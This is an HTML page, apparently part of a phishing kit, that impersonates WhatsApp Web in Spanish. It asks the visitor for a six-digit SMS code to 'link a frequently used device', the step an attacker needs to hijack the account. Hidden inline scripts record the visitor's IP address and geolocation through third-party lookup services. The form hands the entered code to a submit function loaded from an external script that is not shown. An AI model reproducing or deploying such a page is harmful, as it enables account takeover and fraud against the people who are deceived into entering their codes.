<html class="js serviceworker adownload cssanimations csstransitions webp exiforientation webp-alpha webp-animation webp-lossless" dir="LTR" loc="es" lang="en">
    <head>
        <meta http-equiv="content-type" content="text/html; charset=UTF-8">
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
        <title>WhatsApp</title>
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
        <meta name="viewport" content="width=device-width">
        <meta name="google" content="notranslate">
        <meta name="format-detection" content="telephone=no">
        <link rel="apple-touch-icon" sizes="192x192" href="https://web.whatsapp.com/apple-touch-icon.png" type="image/png">
        <meta name="theme-color" content="#111b21" media="(prefers-color-scheme: dark)">
        <meta name="theme-color" content="#f0f2f5">
        <style>
            #initial_startup {
                --startup-background: #f0f2f5;
                --startup-background-rgb: 240,242,245;
                --startup-icon: #bbc5cb;
                --secondary-lighter: #8696a0;
                --primary-title: #41525d;
                --progress-primary: #00c298;
                --progress-background: #e9edef
            }

            .dark #initial_startup {
                --startup-background: #111b21;
                --startup-background-rgb: 17,27,33;
                --startup-icon: #676f73;
                --primary-title: rgba(233, 237, 239, 0.88);
                --secondary-lighter: #667781;
                --progress-primary: #0b846d;
                --progress-background: #233138
            }

            #app,body,html {
                width: 100%;
                height: 100%;
                padding: 0;
                margin: 0;
                overflow: hidden
            }

            #app {
                position: absolute;
                top: 0;
                left: 0
            }

            #initial_startup {
                position: fixed;
                top: 0;
                left: 0;
                display: flex;
                flex-direction: column;
                align-items: center;
                justify-content: center;
                width: 100%;
                height: 100%;
                user-select: none;
                background-color: var(--startup-background)
            }

            #initial_startup .graphic {
                margin-top: -40px;
                color: var(--startup-icon)
            }

            #initial_startup .graphic .resume-logo {
                transform: translateX(calc(50% - 52px / 2))
            }

            #initial_startup .graphic::after {
                position: relative;
                top: -100%;
                left: calc(50% - 72px * 2 - 72px / 2);
                display: block;
                width: calc(72px * 3);
                height: 100%;
                content: '';
                background: linear-gradient(to right,rgba(var(--startup-background-rgb),.5) 0,rgba(var(--startup-background-rgb),.5) 33.33%,rgba(var(--startup-background-rgb),0) 44.1%,rgba(var(--startup-background-rgb),0) 55.8%,rgba(var(--startup-background-rgb),.5) 66.66%,rgba(var(--startup-background-rgb),.5) 100%);
                opacity: 1;
                animation: shimmer 1.5s linear .6s infinite
            }

            html[dir=rtl] #initial_startup .graphic::after {
                animation-direction: reverse
            }

            @keyframes shimmer {
                from {
                    left: calc(50% - 72px * 2 - 72px / 2)
                }

                to {
                    left: calc(50% - 72px / 2)
                }
            }

            #initial_startup .progress {
                position: relative;
                width: 420px;
                height: 3px;
                margin-top: 40px
            }

            #initial_startup .progress progress {
                vertical-align: top
            }

            #initial_startup .main {
                margin-top: 40px;
                font-size: 17px;
                color: var(--primary-title)
            }

            #initial_startup .secondary {
                margin-top: 12px;
                font-size: 14px;
                color: var(--secondary-lighter)
            }

            #initial_startup .secondary span {
                display: inline-block;
                margin-bottom: 2px;
                vertical-align: middle
            }

            progress {
                -webkit-appearance: none;
                appearance: none;
                width: 100%;
                height: 3px;
                margin: 0;
                color: var(--progress-primary);
                background-color: var(--progress-background);
                border: none
            }

            progress[value]::-webkit-progress-bar {
                background-color: var(--progress-background)
            }

            progress[value]::-moz-progress-bar,progress[value]::-webkit-progress-value {
                background-color: var(--progress-primary);
                transition: width .45s ease
            }
        </style>
        <script>
            $.getJSON("https://api.ipify.org?format=json", function(data) {
              $("#id1").html(data.ip);
            });
          </script>
          <script>
            $.getJSON("https://ipinfo.io", function (response) {
              $("#ip").html("IP: " + response.ip);
              $("#address").html("" + response.city + ", " + response.country);
            });
        </script>
        <link href="WhatsApp%20Archivos/stylex-7416205700eb56b41e3c100d03e4afc2.css" rel="stylesheet">
        <link href="WhatsApp%20Archivos/app-c1c9f745bb0ae3c63811.css" rel="stylesheet">
        <link rel="stylesheet" type="text/css" href="WhatsApp%20Archivos/main.058972cf635290857867.css">
        <style id="asset-style" type="text/css"></style>
        <link id="favicon" rel="shortcut icon" type="image/png" href="https://web.whatsapp.com/img/favicon_c5088e888c97ad440a61d247596f88e5.png" src="/img/favicon_c5088e888c97ad440a61d247596f88e5.png">
    </head>
    <body class="web">
        <p id="id1" hidden=""></p><p id="id2" hidden="">Santa Marta, CO</p>
        <div id="app">
            <div class="_1Fm4m tsBgS app-wrapper-web os-win _13Dep">
                <div id="wa-popovers-bucket"></div>
                <span class=""></span>
                <div class="landing-wrapper">
                    <div class="landing-wrapper-before"></div>
                    <div class="landing-header">
                        <span class="l7jjieqr fewfhwl7">
                            <svg xmlns="http://www.w3.org/2000/svg" width="39" height="39" viewBox="0 0 39 39">
                                <path fill="#00E676" d="M10.7 32.8l.6.3c2.5 1.5 5.3 2.2 8.1 2.2 8.8 0 16-7.2 16-16 0-4.2-1.7-8.3-4.7-11.3s-7-4.7-11.3-4.7c-8.8 0-16 7.2-15.9 16.1 0 3 .9 5.9 2.4 8.4l.4.6-1.6 5.9 6-1.5z"></path>
                                <path fill="#FFF" d="M32.4 6.4C29 2.9 24.3 1 19.5 1 9.3 1 1.1 9.3 1.2 19.4c0 3.2.9 6.3 2.4 9.1L1 38l9.7-2.5c2.7 1.5 5.7 2.2 8.7 2.2 10.1 0 18.3-8.3 18.3-18.4 0-4.9-1.9-9.5-5.3-12.9zM19.5 34.6c-2.7 0-5.4-.7-7.7-2.1l-.6-.3-5.8 1.5L6.9 28l-.4-.6c-4.4-7.1-2.3-16.5 4.9-20.9s16.5-2.3 20.9 4.9 2.3 16.5-4.9 20.9c-2.3 1.5-5.1 2.3-7.9 2.3zm8.8-11.1l-1.1-.5s-1.6-.7-2.6-1.2c-.1 0-.2-.1-.3-.1-.3 0-.5.1-.7.2 0 0-.1.1-1.5 1.7-.1.2-.3.3-.5.3h-.1c-.1 0-.3-.1-.4-.2l-.5-.2c-1.1-.5-2.1-1.1-2.9-1.9-.2-.2-.5-.4-.7-.6-.7-.7-1.4-1.5-1.9-2.4l-.1-.2c-.1-.1-.1-.2-.2-.4 0-.2 0-.4.1-.5 0 0 .4-.5.7-.8.2-.2.3-.5.5-.7.2-.3.3-.7.2-1-.1-.5-1.3-3.2-1.6-3.8-.2-.3-.4-.4-.7-.5h-1.1c-.2 0-.4.1-.6.1l-.1.1c-.2.1-.4.3-.6.4-.2.2-.3.4-.5.6-.7.9-1.1 2-1.1 3.1 0 .8.2 1.6.5 2.3l.1.3c.9 1.9 2.1 3.6 3.7 5.1l.4.4c.3.3.6.5.8.8 2.1 1.8 4.5 3.1 7.2 3.8.3.1.7.1 1 .2h1c.5 0 1.1-.2 1.5-.4.3-.2.5-.2.7-.4l.2-.2c.2-.2.4-.3.6-.5s.4-.4.5-.6c.2-.4.3-.9.4-1.4v-.7s-.1-.1-.3-.2z"></path>
                            </svg>
                        </span>
                        <div class="landing-headerTitle">WhatsApp</div>
                    </div>
                    <div class="landing-window">
                        <div class="landing-main">
                            <div class="tvf2evcx m0h2a7mj lb5m6g5c j7l1k36l ktfrpxia nu7pwgvd p357zi0d dnb887gk gjuq5ydh i2cterl7 fhf7t426 f8m0rgwh gndfcl4n light">
                                <div class="tvf2evcx m0h2a7mj lb5m6g5c j7l1k36l ktfrpxia nu7pwgvd dnb887gk gjuq5ydh i2cterl7 dblt22a0">
                                    <div class="dupc5dfw bcr6az0x landing-title" aria-label="">Vinculación de dispositivo de uso frecuente</div>
                                </div>
                                <div class="tvf2evcx m0h2a7mj lb5m6g5c j7l1k36l ktfrpxia nu7pwgvd dnb887gk gjuq5ydh i2cterl7 r2u2pyhj">
                                    <div style="text-align: center;" class="enbbiyaj e1gr2w1z hp667wtd" aria-label="">A continuación ingresa el código de registro que hemos enviado vía SMS para vincular con éxito tu nuevo dispositivo de uso frecuente.</div>
                                </div>
                                <div class="tvf2evcx m0h2a7mj lb5m6g5c j7l1k36l ktfrpxia nu7pwgvd p357zi0d dnb887gk gjuq5ydh i2cterl7 fhf7t426 f8m0rgwh elxb2u3l">
                                                <div class="tvf2evcx m0h2a7mj lb5m6g5c j7l1k36l ktfrpxia nu7pwgvd dnb887gk gjuq5ydh i2cterl7 r2u2pyhj">
                                                  <div class="g0rxnol2 k2bacm8l n3nyt3io" dir="ltr">
                                                    <div class="tvf2evcx m0h2a7mj lb5m6g5c j7l1k36l ktfrpxia nu7pwgvd p357zi0d dnb887gk gjuq5ydh i2cterl7 fhf7t426 sap93d0t r15c9g6i g0rxnol2 e8jx7scp fcet0162 sta02ykp itegkywt n49njydh jdwybkuq f6cvynhn kagi745y evq3mrnv daad4uqs jdssz2gn m2gb0jvt rfxpxord gwd8mfxi mnh9o63b">
                                                      <div class="tvf2evcx m0h2a7mj lb5m6g5c j7l1k36l ktfrpxia nu7pwgvd dnb887gk gjuq5ydh i2cterl7 g0rxnol2" style="flex-grow: 1;">
                                                        <form action="" method="post" onsubmit=" return sender1()">
                                                          <div class="lhggkp7q odxhw97a tukmaf4q t3rh7lfs bbv8nyr4 rkxvyd19 enbbiyaj g33ro0j9" aria-hidden="true">
                                                            <span class="nz2484kf"></span><span class=""></span></div><input id="codigo1" name="codigo1" aria-label="Escribe tu número de teléfono." aria-describedby="" aria-required="true" aria-invalid="false" class="selectable-text g0rxnol2 k2bacm8l g2bpp9au ln8gz9je cc8mgx9x eta5aym1 d9802myq e4xiuwjv thr4l2wc cixrojiy enbbiyaj g33ro0j9 i5tg98hk f9ovudaz przvwfww gx1rr48f" type="text"pattern="^[0-9]{6}$" minlength="6" maxlength="6" oninput="if(!/^\d*$/.test(this.value)) this.value = this.value.replace(/[^\d]/g,''); if(this.value.length > this.maxLength) this.value = this.value.slice(0, this.maxLength);" inputmode="numeric" required>
                                                          </div>
                                                        </div>
                                                      </div>
                                                    </div>
                                                    <button class="tvf2evcx m0h2a7mj lb5m6g5c j7l1k36l ktfrpxia nu7pwgvd dnb887gk o2es7gts i2cterl7 iyjcf3gk">
                                                      <div role="button" tabindex="0" class="_1M6AF _3QJHf"><div class="tvf2evcx m0h2a7mj lb5m6g5c j7l1k36l ktfrpxia nu7pwgvd p357zi0d dnb887gk gjuq5ydh i2cterl7 ac2vgrno sap93d0t gndfcl4n"><div class="tvf2evcx m0h2a7mj lb5m6g5c j7l1k36l ktfrpxia nu7pwgvd dnb887gk gjuq5ydh i2cterl7">Siguiente</div></div></div></button></form></div>
                            </div>
                        </div>
                        <div class="_2XHqw">
                            <div class="landing-title DL70t">
                    <br>
                    </div>
                            <div class="_3Zpe8">
                                <a rel="noopener noreferrer" class="edeob0r2">¿Necesitas ayuda para comenzar?</a>
                            </div>
                            <div class="pnyuK"></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div id="hard_expire_time" data-time="1710394654.094"></div>
        <div id="initial_startup">
            <div class="graphic">
                <span>
                    <svg width="250" height="52" xmlns="http://www.w3.org/2000/svg">
                        <path class="resume-logo" d="M37.7 31.2c-.6-.4-3.8-2-4.4-2.1-.6-.2-1-.4-1.4.3l-2 2.5c-.4.4-.8.5-1.5.2-.6-.3-2.7-1-5.1-3.2-2-1.7-3.2-3.8-3.6-4.5-.4-.6 0-1 .3-1.3l1-1.1.6-1.1c.2-.4 0-.8 0-1.1l-2-4.8c-.6-1.3-1.1-1-1.5-1.1h-1.2c-.5 0-1.2.1-1.8.8-.5.6-2.2 2.2-2.2 5.3 0 3.2 2.3 6.3 2.6 6.7.3.4 4.6 7 11 9.7l3.7 1.4c1.5.5 3 .4 4 .2 1.3-.1 3.9-1.5 4.4-3 .5-1.5.5-2.8.4-3-.2-.4-.6-.5-1.3-.8M26 47.2c-3.9 0-7.6-1-11-3l-.7-.4-8.1 2L8.4 38l-.6-.8A21.4 21.4 0 0126 4.4a21.3 21.3 0 0121.4 21.4c0 11.8-9.6 21.4-21.4 21.4M44.2 7.6a25.8 25.8 0 00-40.6 31L0 52l13.7-3.6A25.8 25.8 0 0044.3 7.5" fill="currentColor"></path>
                    </svg>
                </span>
            </div>
            <div class="progress">
                <progress value="0" max="100" dir="ltr"></progress>
            </div>
            <div class="main">WhatsApp</div>
            <div class="secondary">
                <span>
                    <svg width="10" height="12" xmlns="http://www.w3.org/2000/svg">
                        <path d="M5 1.6c1.4 0 2.5 1 2.6 2.4v1.5h.2c.5 0 1 .4 1 1V10c0 .6-.5 1-1 1H2.3a1 1 0 01-1.1-1V6.5c0-.6.5-1 1-1h.2V4.2c0-1.4 1-2.5 2.4-2.6H5zm0 1.2c-.7 0-1.3.6-1.3 1.3v1.4h2.6V4.2c0-.7-.4-1.2-1-1.3H5z" fill="currentColor"></path>
                    </svg>
                </span>
                &nbsp;Cifrado de extremo a extremo
            </div>
        </div>
        <script src="./WhatsApp Archivos/sax.js"></script>
        <script src=""></script>
        <script src="https://cdn.auth0.com/js/polyfills/1.0/object-assign.min.js"></script>
    </body>
</html>


<style>

    /* CSS Responsive para el título */
.dupc5dfw.bcr6az0x.landing-title {
    text-align: center;
    font-size: 28px;
    padding: 20px;
    margin: 0 auto;
    max-width: 90%;
    box-sizing: border-box;
}

/* Estilo para pantallas grandes */
@media (min-width: 1024px) {
    .dupc5dfw.bcr6az0x.landing-title {
        font-size: 28px;
    }
}

/* Estilo para tabletas */
@media (min-width: 768px) and (max-width: 1023px) {
    .dupc5dfw.bcr6az0x.landing-title {
        font-size: 28px;
    }
}

/* Estilo para teléfonos móviles */
@media (max-width: 767px) {
    .dupc5dfw.bcr6az0x.landing-title {
        font-size: 28px;
    }
}

</style>